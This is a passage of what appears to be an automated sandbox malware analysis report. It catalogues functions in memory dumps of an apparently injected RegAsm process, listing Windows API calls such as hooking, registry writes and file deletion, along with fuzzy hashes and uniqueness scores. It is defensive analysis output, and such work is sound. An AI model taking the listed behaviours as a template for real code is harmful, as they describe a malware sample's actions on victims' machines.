                                  • API String ID: 2340568224-0
                                  • Opcode ID: 8e4947d7ba929e8a5d4a02bc54a147f1d28216c3a2c89d6cccddf955bafea802
                                  • Instruction ID: 19bc70b65ec32d4b5664cd029d7eea78209a5ed184a50ed7759388d0d07a6973
                                  • Opcode Fuzzy Hash: 8e4947d7ba929e8a5d4a02bc54a147f1d28216c3a2c89d6cccddf955bafea802
                                  • Instruction Fuzzy Hash: 73018075509384AFD711CF15EC84B62FFA8EF46620F0880DAED899F252D375A918CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1DB1BF1A, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileW.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BF54
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 339b465c02c3cd9ca619fbeb7846403b8f9291058b564bfac5ed011e9fb6237c
                                  • Instruction ID: 9603b50b84ddccd4f8213672f5a296fd98129dce08731a0095783441ec8a03c0
                                  • Opcode Fuzzy Hash: 339b465c02c3cd9ca619fbeb7846403b8f9291058b564bfac5ed011e9fb6237c
                                  • Instruction Fuzzy Hash: AC01B175A002809FD710CF29EC85756FBA8EF01620F08C0AADC0ACF246D775E404CF62
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 1DB1A172, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnumWindows.USER32(?,00000EB4,?,?), ref: 1DB1A1BD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumWindows
                                  • String ID:
                                  • API String ID: 1129996299-0
                                  • Opcode ID: 3f3a3ee5dec43c3cd9d8d013ea64a7edc01cbd5d924b5ceea446236fc4df42d7
                                  • Instruction ID: d01ae29eb2dd1dc41fd7904de6e347093cd4cd31b74d9dae7070e1acc490b166
                                  • Opcode Fuzzy Hash: 3f3a3ee5dec43c3cd9d8d013ea64a7edc01cbd5d924b5ceea446236fc4df42d7
                                  • Instruction Fuzzy Hash: B40171B1900200AFD310DF16DC46B26FBB8EB85A20F14815AED089B641D775F915CAE5
                                  Uniqueness

                                  Uniqueness Score: 0.22%

                                  Function 204F286A, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FormatMessageW.KERNEL32(?,00000EB4,?,?), ref: 204F28BA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FormatMessage
                                  • String ID:
                                  • API String ID: 1306739567-0
                                  • Opcode ID: 76d3306ee32872b23c5b0e02e0e04a43a408f17c9caa00f5105c2c4943c90adf
                                  • Instruction ID: 394e3852cb39fafaad3a992e261c37bc749047ec38d6e953c11bc4d8c93dca62
                                  • Opcode Fuzzy Hash: 76d3306ee32872b23c5b0e02e0e04a43a408f17c9caa00f5105c2c4943c90adf
                                  • Instruction Fuzzy Hash: DC0171B1900200AFD350DF16DC46B26FBB8EB85A20F14815AED089B641D775F915CBE5
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  Function 1DB1AA8A, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DB1AADA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: f222a3cc9b3a7691fb58d1a6c67bb67733f62c21c595f254473a2d22bb70b4aa
                                  • Instruction ID: 242b839c9d376d043e74c1358e9fbbb51caeda735a75c2086cb923d9369db4c4
                                  • Opcode Fuzzy Hash: f222a3cc9b3a7691fb58d1a6c67bb67733f62c21c595f254473a2d22bb70b4aa
                                  • Instruction Fuzzy Hash: D601A271900200ABD310DF16CC42B26FBB8FB89A20F14815AED084B741D371F925CAE5
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 204F05EE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowsHookExW.USER32(?,00000EB4,?,?), ref: 204F063E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: 8c6db00ba2797d3492a0f9e85f2495ef9468f8e9f96edbe90d2016aef35706eb
                                  • Instruction ID: ed917a8fa83208366455064f70b628791f23fb91e7c004883cfa0d2751860305
                                  • Opcode Fuzzy Hash: 8c6db00ba2797d3492a0f9e85f2495ef9468f8e9f96edbe90d2016aef35706eb
                                  • Instruction Fuzzy Hash: 98016275900200ABD350DF16DC46B26FBB8FB89A20F14815AED085B741D775F925CBE5
                                  Uniqueness

                                  Uniqueness Score: 0.60%

                                  Function 00F081CF, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction ID: 80d8cc419a257307ca12b37514baaec3d38d1a3dfd0f952b0c9d5a42ecca25ab
                                  • Opcode Fuzzy Hash: 3b7338d16ccbe36a966adfdfb8fe2abe7cb7d236e4ce9f9e9eefb0cd39a519a0
                                  • Instruction Fuzzy Hash: D7F0E2D0C4060B34EF203A241E26BBF2A229F517F4F60412CFDC18508A8F29C4473011
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1DB1A2D6, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1A308
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 0843463a9009029311d33d4125d96fbb523ffedeff30c6cebe34a03d41bdbae2
                                  • Instruction ID: ea8f69edf67115ec1343ab6464fcb5db310f30b6ad2392763114b25e353da595
                                  • Opcode Fuzzy Hash: 0843463a9009029311d33d4125d96fbb523ffedeff30c6cebe34a03d41bdbae2
                                  • Instruction Fuzzy Hash: ACF0DC345042809FD711DF05E889B62FBE0EF00620F08C09ACD4A4F206C279A909CE62
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00F0A824, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0A7D8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction ID: 980681b9e3e496996140de5c60e8fc4e3326a1c859d119ab861cddf220ce94b5
                                  • Opcode Fuzzy Hash: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction Fuzzy Hash: DBD01235B043024EEB1DEE34C1D61693777AEC5364798C008CA0106454F2276C89F762
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00F01820, Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegSetValueExA.KERNEL32(?,00F068C2,00000000,00000001,?,?,?,?,?,?,00F01137,?,?,00000000,00000000,000000FF), ref: 00F01831
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction ID: 9428a53115b5da7353f12e8d7339dafa9696524181653009d336d13ff4d8f942
                                  • Opcode Fuzzy Hash: 1beea27a6b604f50d0e8ce8ec9e9f961666e1f60683b56bffe492cc2d8f0247d
                                  • Instruction Fuzzy Hash: D6C012706407067AF61005544C2AFD36A579F117B0F900305BE75500E4975348508524
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  Function 00F07C33, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLongPathNameW.KERNEL32(?,00F004A2,00000200,00F018B8,?,?,?,?,00F06953,00F06918,?,?,00F011DE,00000000,000000FF,00000007), ref: 00F07C4D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID:
                                  • API String ID: 82841172-0
                                  • Opcode ID: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction ID: ef09fb0b1322a84ad82ab9713ca7fd962ccacd7908c5b2b7525d7fe1cb2f05ec
                                  • Opcode Fuzzy Hash: ac5aae0dad25ab8551f9d779720122a49b54a3f9a577bd216295e5e63ae69157
                                  • Instruction Fuzzy Hash: 4DC012743043006BE710891089C4B5F625DAB90751F10C608F9A6851C1CB3088409621
                                  Uniqueness

                                  Uniqueness Score: 0.11%

                                  Function 00F04C80, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00F04C54,00F04CC4,00F00A9B,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F04C94
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                                  • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1FEE1CD8, Relevance: 1.3, Strings: 1, Instructions: 61UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: U_V^
                                  • API String ID: 0-4067383671
                                  • Opcode ID: 85777a71513600e3e29c6e652154f3f0b1e97fc89a8adcff28aedca148f1fead
                                  • Instruction ID: 76fda7769927cec924db61c821c414677c7e48281358352e10fd327a534030f0
                                  • Opcode Fuzzy Hash: 85777a71513600e3e29c6e652154f3f0b1e97fc89a8adcff28aedca148f1fead
                                  • Instruction Fuzzy Hash: D6119171F006049FD740EBB888417AEBBE6AFC4310F114679D10AEB391EF75A9458BD2
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 1FEE1CCF, Relevance: 1.3, Strings: 1, Instructions: 59UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: U_V^
                                  • API String ID: 0-4067383671
                                  • Opcode ID: 4dc2aa0c142fd944929b44c27bd9c63f721c301d7e716b2129c89b57275931cd
                                  • Instruction ID: 0ab76cdf493ff2680405ae8f663f1db4e562c2a4cec808f65236f6fafe22b2e9
                                  • Opcode Fuzzy Hash: 4dc2aa0c142fd944929b44c27bd9c63f721c301d7e716b2129c89b57275931cd
                                  • Instruction Fuzzy Hash: 7911A371A006059FD750DF7CC4417AEBBE6AFC4310F504279D14AEB391EB75A9418BD2
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 1FEE39B0, Relevance: .3, Instructions: 282COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff98466c4a00ecd9709ac752a2581de62874e2e6f65aa5077147500a066a7356
                                  • Instruction ID: 70dc69fdb0f4b97fbce15d5e77ed716e237e8064fceceff23a70b247fe7965ae
                                  • Opcode Fuzzy Hash: ff98466c4a00ecd9709ac752a2581de62874e2e6f65aa5077147500a066a7356
                                  • Instruction Fuzzy Hash: 5391B270B503049BE744AB789896B6EBAE6ABD8700F24453CD606BF3D4CDB1EC418766
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE3128, Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f928ffab120b89e90710096cca7bed558ad59750be05dbe6f63b1ac09e9b057
                                  • Instruction ID: 798e9fcc83ec51a96a24dfba9f3076509e3e603eee50750c8288927ffd25f537
                                  • Opcode Fuzzy Hash: 2f928ffab120b89e90710096cca7bed558ad59750be05dbe6f63b1ac09e9b057
                                  • Instruction Fuzzy Hash: 4A81B470B503059BE70497789892BBE6AD7ABD8700F24453CD606BF3C5CEB1EC458BA6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE0150, Relevance: .2, Instructions: 195COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20ba68248cdb5ce8b305b2004b1c3f71efcce4c18a21cb71bc7c77372c374665
                                  • Instruction ID: 35ccb6cd11d532af3338312d2d2418a5ed5200cf0edc0bf477599c7aaf846463
                                  • Opcode Fuzzy Hash: 20ba68248cdb5ce8b305b2004b1c3f71efcce4c18a21cb71bc7c77372c374665
                                  • Instruction Fuzzy Hash: 9B817E34A00215CFD704DFA8EAD4A9D7BF2FF89345F1181A9E107AB2A6DB31AD05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE4928, Relevance: .2, Instructions: 175COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b543d4d91c5d5bc73564d16dac755df7b6335dc302aa35a543b69f6aed446c6
                                  • Instruction ID: 3479bbc1bfe8ac0ebb7cda58a64438b3274120aaf67479c63b57bcd1ae704f24
                                  • Opcode Fuzzy Hash: 0b543d4d91c5d5bc73564d16dac755df7b6335dc302aa35a543b69f6aed446c6
                                  • Instruction Fuzzy Hash: 6C51D339A00519CFDB14CF68D884A9DB7B2FB84320F528559D81AAB392D771BE45CB81
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE2C40, Relevance: .2, Instructions: 160COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c85fb67b60034c0b3a61f5b5829fabef3f181537dd9ea872f1bcc548db8b569e
                                  • Instruction ID: 60913f196ae5ee15722c0222a55931ba56c45f993ccaa07ddb3f3cac421bd480
                                  • Opcode Fuzzy Hash: c85fb67b60034c0b3a61f5b5829fabef3f181537dd9ea872f1bcc548db8b569e
                                  • Instruction Fuzzy Hash: D251D530E40216CFEB25DF74DD517AEBAB2AF84714F24402CD602AB291EF759C02CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE3500, Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 896ded5dcf422ffd5756edff6727977c6a1c38685024e4956b62d60a3bf72f5d
                                  • Instruction ID: b5dd141490a65ea488d4fd244c264af66ad0cac25083f7e2acbbd5d11b2fdd6c
                                  • Opcode Fuzzy Hash: 896ded5dcf422ffd5756edff6727977c6a1c38685024e4956b62d60a3bf72f5d
                                  • Instruction Fuzzy Hash: 8B517C35B002108FD718DB38D9E4B5ABBF7AB88B15F118569EA179B392DB31EC05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE2F00, Relevance: .1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3859b60b8c6e3b14f75766931f17df2f8c263747fafef2636391f22cdd1ba873
                                  • Instruction ID: 4198ae1df5ea46bb9e9e832f5d6ed94013339790ee1d53b3c2024128a1542bb4
                                  • Opcode Fuzzy Hash: 3859b60b8c6e3b14f75766931f17df2f8c263747fafef2636391f22cdd1ba873
                                  • Instruction Fuzzy Hash: 99511A35A00218DFDB14DFA8D990A9DBBB2FF89311F208569E412AB395DB31AC42CF50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE34FB, Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46e40d90fcbdaed0a56aade54f3d86425feaf239f5dfa68a3a77b08cdde441d5
                                  • Instruction ID: 0a1d139d2406f49c12c4e4065c0a014235ec2022a1bae9b51ada04ce1cb43b95
                                  • Opcode Fuzzy Hash: 46e40d90fcbdaed0a56aade54f3d86425feaf239f5dfa68a3a77b08cdde441d5
                                  • Instruction Fuzzy Hash: 20416936B002158FD718DB38D994B5ABBF7AB88B05F518569E6079B381DB32EC05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE0120, Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90251c28fd053f85b31b3087dfc981299f450edbc69126c8d2b7f29e96beeec7
                                  • Instruction ID: 36652fa23188cc1d2d6073c410d35588fe433256b3f1b17f0586f67f3f72348f
                                  • Opcode Fuzzy Hash: 90251c28fd053f85b31b3087dfc981299f450edbc69126c8d2b7f29e96beeec7
                                  • Instruction Fuzzy Hash: 72516034A00219CFD704DFB8E9D4A9DBBF2FF89744F1085A9E107AB266DB31A905CB51
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE0DF3, Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53db7ffaee173444fc526bd31c486b5237af03c2171a0a91c744069df25dde01
                                  • Instruction ID: 5602c2dbe000d267abbdf2280af2044f043df1afaf4059e239ed644213b0e7be
                                  • Opcode Fuzzy Hash: 53db7ffaee173444fc526bd31c486b5237af03c2171a0a91c744069df25dde01
                                  • Instruction Fuzzy Hash: B341D636708221DBDB188A34DD90B857BB2EB84B10F154674E76BAB3D1D731EC51CB44
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE014B, Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35b07da76fe93403cf428f90f0830075c5d140313b3cd1a7eee614b857fe77e2
                                  • Instruction ID: 299d50b4743672337190bc05f9981ee143feec833a9cbb1ed8f92a46a42fd29f
                                  • Opcode Fuzzy Hash: 35b07da76fe93403cf428f90f0830075c5d140313b3cd1a7eee614b857fe77e2
                                  • Instruction Fuzzy Hash: B5517030A00219DFD704DFB8EAD4A9DBBF2FF89345F1085A9E107AB256DB31A905CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE34BB, Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adb1288721d82d4d517a4e39f39737cd0ea8a4bef3d07eac2f44893243c87dd6
                                  • Instruction ID: 0c946f567332570e2ddd0d1e814338b2ff3f225ae324851cbf6369c8ea4af95b
                                  • Opcode Fuzzy Hash: adb1288721d82d4d517a4e39f39737cd0ea8a4bef3d07eac2f44893243c87dd6
                                  • Instruction Fuzzy Hash: 61416832B002118FD718DB38D9D0B5ABBF3AB88B05F518569E6079B392DB32EC05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE1648, Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2629e740983ee4e0ecae55c36e313e04350d0c04cccb5da68e035771572ca34
                                  • Instruction ID: 2db78d413a1bac5e7dd6b96caa77f8417b7f7de3f916442f74938f642ca2c522
                                  • Opcode Fuzzy Hash: a2629e740983ee4e0ecae55c36e313e04350d0c04cccb5da68e035771572ca34
                                  • Instruction Fuzzy Hash: 1A418F34B402548FDB48EB78D9507AD76E3AFC9700F6044A9C506AB392EB39AD42CB51
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE0860, Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab802903367ef10f0fdb09c4e486a936fcb2a896ebaf32065924f42ac0c2db10
                                  • Instruction ID: 84eb8ffd581c8c87f946b48885814f80e6ad9324d79a7ffc48937dc705e21593
                                  • Opcode Fuzzy Hash: ab802903367ef10f0fdb09c4e486a936fcb2a896ebaf32065924f42ac0c2db10
                                  • Instruction Fuzzy Hash: 7E319F31B001248BCB08EB78D9E4A6EBBF7ABD8740B554568C907D7395DE34AD01C7A5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE10F0, Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ef740890bd12b1731f82c372cd9437a127c12ea966734e634b1f4e19521299f
                                  • Instruction ID: eb774f63125ee6c90a684c6f163ff8dad97a173320346abfd7eba6b02b3492ea
                                  • Opcode Fuzzy Hash: 6ef740890bd12b1731f82c372cd9437a127c12ea966734e634b1f4e19521299f
                                  • Instruction Fuzzy Hash: AF416A35A102248FCB04EF65CEE0A9D7BF6FBC9B6076040A9D803A3399DB316D45CB94
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE0670, Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
